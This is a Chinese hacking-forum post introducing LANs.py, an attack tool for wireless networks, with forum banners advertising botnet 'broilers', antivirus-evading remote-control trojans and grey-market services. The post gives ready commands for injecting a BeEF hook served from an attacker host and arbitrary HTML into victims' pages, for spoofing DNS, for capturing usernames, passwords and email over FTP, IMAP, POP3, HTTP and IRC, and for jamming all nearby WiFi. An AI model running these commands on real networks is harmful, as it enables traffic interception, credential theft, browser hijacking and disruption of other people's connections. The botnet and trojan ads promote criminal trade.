开启邀请码注册中,禁止灌水!发现一次永久禁言

墨客安全网

 找回密码
 立即注册

墨客安全网-新手入门指南 常见问题及帮助 | 做任务赚墨币币 新人报道 | 悬赏问答| 墨币充值| 帖子举报

墨客安全网-论坛精华合集 墨客安全网 -精华合集 之 速成之路 原创精品 | 加入墨客Vip | Vip工具| Vip教程

墨客安全网-进阶技术学习区 软件/工具| 社工专区 | 入侵检测| 技术文章 动画教程 | 编程交流| 免杀更新 | 程序源码

[悬赏公告] - 严查灌水,打造一个无水论坛,从即日起.请大家互相监督,发现恶意灌水的,请发贴举报,核实后会给予5-10的墨币奖励。
[官方公告] 从今日起所有会员发布工具必须到审核板块进行审核,如有违反永久禁言处理!
 [招聘招聘]-招聘各方面给力版主,要求每日发帖不少于3贴,每天在线时间6个小时以上,具体福利和待遇联系TG客服或者在线管理员
[官方公告]1.发现网盘下载地址失效!可以发贴举报 审核证实后给予奖励10-20墨币。2.即日起!不管是谁发贴!都不能带QQ群 已及个人QQ。个人网站,发现后严格处理。[官方业务]-加入墨客安全网Vip,圆你日抓千鸡梦,各种精品教程,免杀远控,压力测试等你拿,期待各位会员的加入,即可享受众多福利!
【官方公告】论坛所有广告均为商业行为,需要交易的请尽量走担保程序,所有因广告产生的任何纠纷请私下解决【站外广告】大量收色刷!刷单肉鸡!带飞机肉鸡!寻内网横向技术!懂的来,小白勿扰!长期包养色刷,刷单,带飞机海外盘国内盘灰产肉鸡稳定鸡商
联系飞机:@seeok91
【官方业务】精品广告位招租,需要请联系官方TG客服【官方业务】精品广告位招租,需要请联系官方TG客服【官方业务】精品广告位招租,需要请联系官方TG客服
查看: 201|回复: 0

[电脑|服务器知识] LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

[复制链接]
  • TA的每日心情

    2018-5-16 05:24
  • 签到天数: 16 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    14

    主题

    334

    回帖

    1539

    积分

    UID
    1497
    威望
    509 (点)
    主题
    14 (帖)
    精华
    0 (帖)
    贡献
    26  (次)
    墨币
    147  (枚)
    活跃
    255  (点)
    担保币
    0  (枚)
    注册时间
    2015-11-7
    最后登录
    2018-5-16
    发表于 2017-9-21 10:44:06 | 显示全部楼层 |阅读模式

    LANs.py功能简介

    1.      自动寻找当前网络中最为活跃的WLAN用户,并对其中的一名用户实施监控,然后向该用户所访问的Web页面注入任意HTML或JavaScript代码

    2.      干扰附近的WiFi网络,干扰范围取决于无线网卡的性能。我们可以通过修改配置来实现干扰所有人的WiFi信号或仅干扰某一特定用户的WiFi信号。但是LANs.py不支持对用户同时进行WiFi干扰和监听。

    依赖组件

    linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目标用户的IP地址,那么你还需要一块支持混杂模式的无线网卡)

    测试环境为Kali Linux,发动攻击的设备地址为192.168.0.5,目标设备的IP地址为192.168.0.10。

    所有的可选操作项:
    Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]                [--directedonly] [--accesspointACCESSPOINT]
    工具使用

    目前该工具支持从以下协议收集数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地址所返回的资源中前135个字符,并自动忽略结尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它还能够输出任意协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

    常用命令:
    python LANs.py -u -p其他常用命令:
    python LANs.py -u -p -d -ip 192.168.0.10

    -d:查看所有的图片

    -ip:设置目标IP地址

    HTML注入:
    python LANs.py -bhttp://192.168.0.5:3000/hook.js

    向目标用户所访问的页面中注入一个BeEF钩子(http://beefproject.com/,【参考教程】),注入的参数会包裹在<script>标签中,所以你可以在一个JavaScript文件中的任意位置输入内容。


    python LANs.py -c'<title>Owned.</title>'

    向目标用户所访问的页面中注入任意HTML代码。工具首先会尝试在第一个<head>标签之后注入内容,如果失败则尝试在第一个</head>标签之前注入内容。上面给出的示例代码会将页面标题(title)修改为’Owned.’。

    读取pcap文件:
    python LANs.py -pcap libpcapfilename -ip192.168.0.10

    为了成功读取pcap文件中的内容,你需要使用-ip参数指定目标IP。该功能的一个优点就是用户无需使用root权限便可执行该脚本。

    DNS欺骗:
    python LANs.py -a -r 80.87.128.67

    -a选项将会对目标发出的每一次DNS请求进行欺骗攻击,并将用户请求重定向至-r参数所制定的地址。无论用户在地址栏中输入的是什么地址,他们都将会被重定向到stallman.org(80.87.128.67)。


    python LANs.py -dns eff.org

    该命令将会对域名eff.org及其子域名进行DNS欺骗。

    其他使用:
    python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10干扰所有的WiFi网络:
    python LANs.py --jam仅干扰指定接入点:
    python Lans.py --jam --accesspoint01:MA:C0:AD:DY

    所有的可用选项

    常规使用:

    -b BEEF_HOOK_URL:将BeEF hookURL注入到目标用户所访问的每一个页面中,例如-b http://192.168.1.10:3000/hook.js

    -c ‘HTML CODE’:向目标用户访问的页面中注入任意HTML代码。

    -d:查看目标用户访问的图片。

    -dns DOMAIN:对指定DNS域名进行DNS欺骗攻击,例如-dnsfacebook.com。

    -a:对用户的所有DNS请求进行DNS欺骗攻击。

    -r IPADDRESS: 仅用于-dnsDOMAIN选项。

    -u:打印出目标用户所使用的URL地址。

    -i INTERFACE: 指定接口,例如-i wlan0。

    -ip:指定目标IP地址。

    -n: 对目标执行nmap扫描。

    -na:在后台对目标执行更具攻击性的nmap扫描,并将扫描结果输出到[victim IP address].nmap.txt。

    -p:打印出FTP/IMAP/POP/IRC/HTTP协议下传输的用户名/密码、以及接收或发送的电子邮件和IRC消息。

    -pcap PCAP_FILE: 解析pcap文件中所有的数据包; 需要输入-ip[target's IP address]参数。

    -rmac ROUTER_MAC:指定路由器的MAC地址。

    -rip ROUTER_IP:指定路由器的IP地址。

    –jam:对2.4GHz无线接入点以及客户端进行干扰攻击。

    WiFi干扰:

    -sMAC_Address_to_skip:指定需跳过的MAC地址。

    -m MAXIMUM: 指定攻击客户端的最大数量。

    -t TIME_INTERVAL: 设置攻击间隔。

    –packets NUMBER:指定每一次攻击中发送的数据包数量。

    –accesspoint ROUTER_MAC:输入目标AP的MAC地址。

    * 参考来源:DanMcInerney, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM


    新人必看帖,如何快速赚取墨币,了解墨客安全网论坛版规,等等...( 点我查看

    如果你在论坛悬赏问答求助问题,并且已经从坛友或者管理的回复中解决了问题,请在帖子内点击(已解决)

    发帖求助前要善用 论坛搜索 功能,如果搜不到可以试试,论坛顶上的 百度站内搜索 - 纵横站内搜索 那里可能会有你要找的答案;

    如果发现论坛有灌水帖、下载地址失效帖、后门帖、广告帖、工具不能正常使用、都可以去 举报版块 发帖举报,核实给予退回墨币+额外的墨币奖励哦;
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    1、请认真发帖,禁止回复纯表情,纯数字等无意义的内容!帖子内容不要太简单!
    2、提倡文明上网,净化网络环境!抵制低俗不良违法有害信息。
    3、每个贴内连续回复请勿多余3贴,每个版面回复请勿多余10贴!
    4、如果你对主帖作者的帖子不屑一顾的话,请勿回帖。谢谢合作!

    关闭

    站长推荐上一条 /1 下一条